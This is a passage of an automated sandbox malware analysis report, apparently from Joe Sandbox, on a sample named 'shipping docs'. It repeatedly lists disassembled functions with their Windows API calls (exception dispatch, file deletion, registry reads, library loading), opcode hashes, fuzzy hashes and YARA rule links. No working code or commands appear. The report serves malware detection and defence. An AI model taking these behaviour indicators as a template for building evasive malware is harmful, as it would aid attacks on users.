                                                                                              • Opcode Fuzzy Hash: cd6917b0ca146c67969f9fa9de1d7c7e46c3c5bdc69ae885712671f2c614bb91
                                                                                              • Instruction Fuzzy Hash: 8D12C934902259CFDB68DF74D898A9CB7B2BF49306F1085E9D60A66350CB359EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9C76 Relevance: 3.4, APIs: 2, Instructions: 354COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061F9D24
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 959c42499c89c26103e17f623cccdbf1f6f68272948242ecd07f737ef24dbad4
                                                                                              • Instruction ID: fd95b60d35860e1521007e3e8f30fc2f77000eb45d108f27b53cfe8d8cc18f8c
                                                                                              • Opcode Fuzzy Hash: 959c42499c89c26103e17f623cccdbf1f6f68272948242ecd07f737ef24dbad4
                                                                                              • Instruction Fuzzy Hash: 2102C934912258CFDB68DF74D898A9CB7B2BF49306F1085E9D60A66350CB359EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9CBB Relevance: 3.3, APIs: 2, Instructions: 347COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061F9D24
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: a16fba03a33cf24c5e54bda42c4bd90ef6b9ae45d24162553225ddac7423be1b
                                                                                              • Instruction ID: 2eab353a361e5e0be093e885f915313d04b087400caeea7efbb18e131faa6d7c
                                                                                              • Opcode Fuzzy Hash: a16fba03a33cf24c5e54bda42c4bd90ef6b9ae45d24162553225ddac7423be1b
                                                                                              • Instruction Fuzzy Hash: 3F02C834902258CFDB68DF74D898A9CB7B2BF49306F1085E9D60A66350CB359EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9D00 Relevance: 3.3, APIs: 2, Instructions: 340COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061F9D24
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: c5fa9e37b772be690a375677ace0e9c71a3948d7f5917ccecc28e7d75f943e1c
                                                                                              • Instruction ID: 87f6f81c421c8fac0752b41c6013299fe96d42b877e41e10b4dfeb4d45845ea5
                                                                                              • Opcode Fuzzy Hash: c5fa9e37b772be690a375677ace0e9c71a3948d7f5917ccecc28e7d75f943e1c
                                                                                              • Instruction Fuzzy Hash: EC02C834902258CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB359EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9D5B Relevance: 1.8, APIs: 1, Instructions: 329COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: b24d634db48130f1b85a52c1abd7ac784be43618e1f6b7b9ac645f98ec51cae5
                                                                                              • Instruction ID: 36b5273f0d3700d06def81d8fd9d5e5933a606e1d2716f212524705c361d768f
                                                                                              • Opcode Fuzzy Hash: b24d634db48130f1b85a52c1abd7ac784be43618e1f6b7b9ac645f98ec51cae5
                                                                                              • Instruction Fuzzy Hash: CD02C834906218CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB799EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9DA0 Relevance: 1.8, APIs: 1, Instructions: 320COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 4e4f21b7ff06d92600a3ad9470f89c7912af54e1697fa38aa0a32b0e2ba04075
                                                                                              • Instruction ID: a6256ca15da608abdebbe2a5a3c40f82b89078441e11650412ac6776ea111e41
                                                                                              • Opcode Fuzzy Hash: 4e4f21b7ff06d92600a3ad9470f89c7912af54e1697fa38aa0a32b0e2ba04075
                                                                                              • Instruction Fuzzy Hash: A2F1C734902258CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9DDC Relevance: 1.8, APIs: 1, Instructions: 315COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: e40631e8a59a96e54093bc0672dd4de8e27670116e521520c4689001efa48b36
                                                                                              • Instruction ID: 9a284cfdce034d083ebdd61d5ab70bb225b1519174a24c3731d7b29c231804eb
                                                                                              • Opcode Fuzzy Hash: e40631e8a59a96e54093bc0672dd4de8e27670116e521520c4689001efa48b36
                                                                                              • Instruction Fuzzy Hash: CBF1C734906258CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9E21 Relevance: 1.8, APIs: 1, Instructions: 308COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: fb6dcba99297b9192954e82802bc328747a474e8836763402dfbf67143adaa77
                                                                                              • Instruction ID: 58c2d94ab182c9ea406c3a146a83fb15c126bf6dc803ebc90d849dbbd3f35568
                                                                                              • Opcode Fuzzy Hash: fb6dcba99297b9192954e82802bc328747a474e8836763402dfbf67143adaa77
                                                                                              • Instruction Fuzzy Hash: 7FF1C834906258CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9E66 Relevance: 1.8, APIs: 1, Instructions: 301COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: d0a71ca3cbf9a3686a4c506afd8ad571df48dd9704e9654487df005afd1e7fe1
                                                                                              • Instruction ID: 7df3b73672f2ebece6b3914cc1a82f8b36f4ed2d7fc0fc45dfdec47cce93286a
                                                                                              • Opcode Fuzzy Hash: d0a71ca3cbf9a3686a4c506afd8ad571df48dd9704e9654487df005afd1e7fe1
                                                                                              • Instruction Fuzzy Hash: 31F1B734906258CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9EAB Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: ef2a553a6ad1cf8e029cbf3a168699f5ee22221f67da963f4150a3867fbc6ffd
                                                                                              • Instruction ID: 3b06e132776348ddece960b8fb92c05d8e3152c6720f97bd1df5afd3765182e8
                                                                                              • Opcode Fuzzy Hash: ef2a553a6ad1cf8e029cbf3a168699f5ee22221f67da963f4150a3867fbc6ffd
                                                                                              • Instruction Fuzzy Hash: 08E1B734906258CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9EF0 Relevance: 1.8, APIs: 1, Instructions: 287COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: cc1f81d3a0ad603fb2816931bf7c12a275bd72200000014f02d183102a1fc88a
                                                                                              • Instruction ID: b4fc29ce9fd472306d2e7d8ba812a06b6e2ceab703d7b65d6e08de4aad0edde9
                                                                                              • Opcode Fuzzy Hash: cc1f81d3a0ad603fb2816931bf7c12a275bd72200000014f02d183102a1fc88a
                                                                                              • Instruction Fuzzy Hash: 00E1C734906218CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9F35 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: ba7d0b689ac59d75a1b560fef4f40accebeb6595d3cf4f96fb5d0f6817811c98
                                                                                              • Instruction ID: 51586a2a66f9aaa44f76a58757811c10e20e827609226fb142409087f39261ed
                                                                                              • Opcode Fuzzy Hash: ba7d0b689ac59d75a1b560fef4f40accebeb6595d3cf4f96fb5d0f6817811c98
                                                                                              • Instruction Fuzzy Hash: B2E1B734906258CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9F71 Relevance: 1.8, APIs: 1, Instructions: 273COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 279087d188cf819b7f6b30d8aa8fcf69b1c0fc1d208f7fe302cc31c8b6b48c85
                                                                                              • Instruction ID: 5ddfea562235f9749f02877403ed1b0e0a00654cb14f92f833d0d1e7b1469d8a
                                                                                              • Opcode Fuzzy Hash: 279087d188cf819b7f6b30d8aa8fcf69b1c0fc1d208f7fe302cc31c8b6b48c85
                                                                                              • Instruction Fuzzy Hash: 29E1C734906218CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB799EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9FB6 Relevance: 1.8, APIs: 1, Instructions: 266COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: e9cc8ef7262e6bb23acf94ca8c12ae10157c0f42b913579f16711eb133422f20
                                                                                              • Instruction ID: 9991b53b16ac6bef1f28200722dd0a4cac599cc31d1f258e4b6a4c4b672286e5
                                                                                              • Opcode Fuzzy Hash: e9cc8ef7262e6bb23acf94ca8c12ae10157c0f42b913579f16711eb133422f20
                                                                                              • Instruction Fuzzy Hash: 4BD1C834906258CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9FFB Relevance: 1.8, APIs: 1, Instructions: 257COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 378c35fc4109cf1c7271865c3afc6a0946c00472ca14fda3f6ce502308faa4f4
                                                                                              • Instruction ID: 0645a0f5a5d5ea01ec514d6bd27f75f0d5dc72713a0cc72b97765a5fb626b704
                                                                                              • Opcode Fuzzy Hash: 378c35fc4109cf1c7271865c3afc6a0946c00472ca14fda3f6ce502308faa4f4
                                                                                              • Instruction Fuzzy Hash: 4BD1C734906218CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061FA037 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 8a76d98402e81906e5cc6549e16d02981a2e0365cb8ede97b3e75481d3f3658b
                                                                                              • Instruction ID: 73283dff9e4dd18cc9bfa5507db2f74dd6c24c57ce6869a722576e41eac5c19b
                                                                                              • Opcode Fuzzy Hash: 8a76d98402e81906e5cc6549e16d02981a2e0365cb8ede97b3e75481d3f3658b
                                                                                              • Instruction Fuzzy Hash: DDD1B834906258CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02DF0877 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1ccd9966f9fd03aaca75a6b76f7c19c4a5c943b030a41700fd257e76135352dc
                                                                                              • Instruction ID: 5c5792d1d90cd842242e0b2329779d653d98325af26442131adf41560defc118
                                                                                              • Opcode Fuzzy Hash: 1ccd9966f9fd03aaca75a6b76f7c19c4a5c943b030a41700fd257e76135352dc
                                                                                              • Instruction Fuzzy Hash: 2E813631E042088FDF50CFA9D8847EEBBB0EB89325F15846AE609E7396D7348C55CB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061FA07C Relevance: 1.7, APIs: 1, Instructions: 245COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 0e661fbf85451ef567dfff37ae41ae03b630cf57a41b4466cd497ac0914f0964
                                                                                              • Instruction ID: f3dd308b0d6d0041a548e0cb540297d093cd636953c78d6ac1df005514ca50a5
                                                                                              • Opcode Fuzzy Hash: 0e661fbf85451ef567dfff37ae41ae03b630cf57a41b4466cd497ac0914f0964
                                                                                              • Instruction Fuzzy Hash: 59D1C934906258CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 068496B8 Relevance: 1.7, APIs: 1, Instructions: 196libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 00553a996aae6215797c998182c515953a44a225be5817bbdc84c17921105e96
                                                                                              • Instruction ID: 6ef29bd18e5b407f708ce7070ab088e739b09b40b68185f9eeface66ec483214
                                                                                              • Opcode Fuzzy Hash: 00553a996aae6215797c998182c515953a44a225be5817bbdc84c17921105e96
                                                                                              • Instruction Fuzzy Hash: F061C530B402099FCB50EBB4D858AEFB7B6EF85308F14856AE506DB751EF30D8458BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F8518 Relevance: 1.7, APIs: 1, Instructions: 173fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 061F86D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 449e4be5a6be0b6389628408db9b849a0a26fcab810814292c46f4c010d10705
                                                                                              • Instruction ID: 1e9e3cd549dfb053370375e526689479e8ac1ef75f3c248f2e379afe6d51b71c
                                                                                              • Opcode Fuzzy Hash: 449e4be5a6be0b6389628408db9b849a0a26fcab810814292c46f4c010d10705
                                                                                              • Instruction Fuzzy Hash: FC51CE71E10259DFCB50CF58C844BAEBBF6EF48324F04C42AE919AB240C774A945CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 06849718 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: d49430c7e092300dac41f475f1ebcb78f026a3ccddb3d2ab6ea37418accf518f
                                                                                              • Instruction ID: 70e806e75a1e65df8159376e4daced78a73ffa1608bacea381ec06a58b59957a
                                                                                              • Opcode Fuzzy Hash: d49430c7e092300dac41f475f1ebcb78f026a3ccddb3d2ab6ea37418accf518f
                                                                                              • Instruction Fuzzy Hash: 40518371A402099FCF44AFB4D858AAEB7B6FF84308F158969D516DB741EF31E8448BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0684FA19 Relevance: 1.6, APIs: 1, Instructions: 125registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 0684FB31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: a637d43720a54e72d02b2b05a2016a77a28365044f12ec2932801dd6095e60e4
                                                                                              • Instruction ID: 0bf35cd715291c17d1ad7eadd372e835704dbc9940f547b3c4d527519041dcfc
                                                                                              • Opcode Fuzzy Hash: a637d43720a54e72d02b2b05a2016a77a28365044f12ec2932801dd6095e60e4
                                                                                              • Instruction Fuzzy Hash: 524136B0D003589FCB10DFA9D884A9EBFF5AF88704F15806EE918AB341D7349945CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0684F761 Relevance: 1.6, APIs: 1, Instructions: 120registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0684F874
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: c1b1d42bd4a685345c5d9b60317f455028bce98cf8b062ad6864cb358eb3e56b
                                                                                              • Instruction ID: dea91758d0c9154b9fcf1d6ee0cf4e8e7b1479c2fde8e2bf1708d3091c8ba072
                                                                                              • Opcode Fuzzy Hash: c1b1d42bd4a685345c5d9b60317f455028bce98cf8b062ad6864cb358eb3e56b
                                                                                              • Instruction Fuzzy Hash: B6414670E053899FDB10DFA9C548A9EBFF5EB88304F15816AE508AB341C7759845CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02DFD66D Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 02DFD742
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: aa86b24d847757749c67f29fdf35369123bbfd4bbdd6c9fed0f40306b5ab8224
                                                                                              • Instruction ID: d3150a6e1ff29926faa0a79710bb91f074b71eb66ba09ec41a64825288c36c94
                                                                                              • Opcode Fuzzy Hash: aa86b24d847757749c67f29fdf35369123bbfd4bbdd6c9fed0f40306b5ab8224
                                                                                              • Instruction Fuzzy Hash: 57314AB4D102498FDB14CFA9D8857DEFBF2BB08314F158529E816AB380D7749885CF9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02DFB734 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 02DFD742
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: ccff7681dffc77389e74506cfabb8fe796e02b47066e96c3c8f50f0b22b4a8d9
                                                                                              • Instruction ID: 5a1f556f25a5dc82b964d233c0ca14e4e934afb1519fa3ed8d4ea85c25ca3857
                                                                                              • Opcode Fuzzy Hash: ccff7681dffc77389e74506cfabb8fe796e02b47066e96c3c8f50f0b22b4a8d9
                                                                                              • Instruction Fuzzy Hash: EF3139B0D002498FDF54CFA9D88579EFBF2BB08314F158129E916AB380D7749845CF9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0684EE98 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 0684FB31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 409e3ed2006225ac9cb305802355462496042c7d6b23281a4216b2b23134030f
                                                                                              • Instruction ID: 84153ea188217bea71074242b22cdfef6f2864fc575cd70222f34ee40b385e19
